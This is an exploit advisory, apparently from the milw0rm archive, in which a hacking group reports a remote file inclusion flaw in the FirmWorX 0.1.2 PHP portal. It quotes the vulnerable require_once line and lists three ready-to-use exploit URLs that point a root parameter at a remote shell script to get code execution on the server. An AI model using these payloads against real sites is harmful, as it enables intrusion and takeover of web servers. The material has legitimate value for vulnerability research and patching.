********************************************************************************************************** DeltaSecurityTEAM WwW.DeltaSecurity.iR ********************************************************************************************************** * Portal Name = FirmWorX 0.1.2 * Class = Remote File Inclusion * Risk = High (Remote File Execution) * Download = http://firmworx.sourceforge.net * Discoverd By = DeltahackingTEAM * User In Delta Team = Dav00d_Cracker * Conatact = Davood_cracker@yahoo.com -------------------------------------------------------------------------------------------- Vulnerability C0de : require_once($fm_data['root']."/includes/config/db.inc.php"); -------------------------------------------------------------------------------------------- - Expl0it: http://localhost/[PATH]/includes/config/master.inc.php?fm_data[root]=Shellz? http://localhost/[PATH]/includes/functions/master.inc.php?fm_data[root]=Shellz? http://localhost/[PATH]/modules/bank/includes/design/main.inc.php?bank_data[root]=Shellz? -------------------------------------------------------------------------------------------- Gr33tz : Dr.Trojan , Hiv++ , D_7j , L0rd , RezaYavari , Vpc , And all I ********************************************************************************************************** # milw0rm.com [2007-05-24]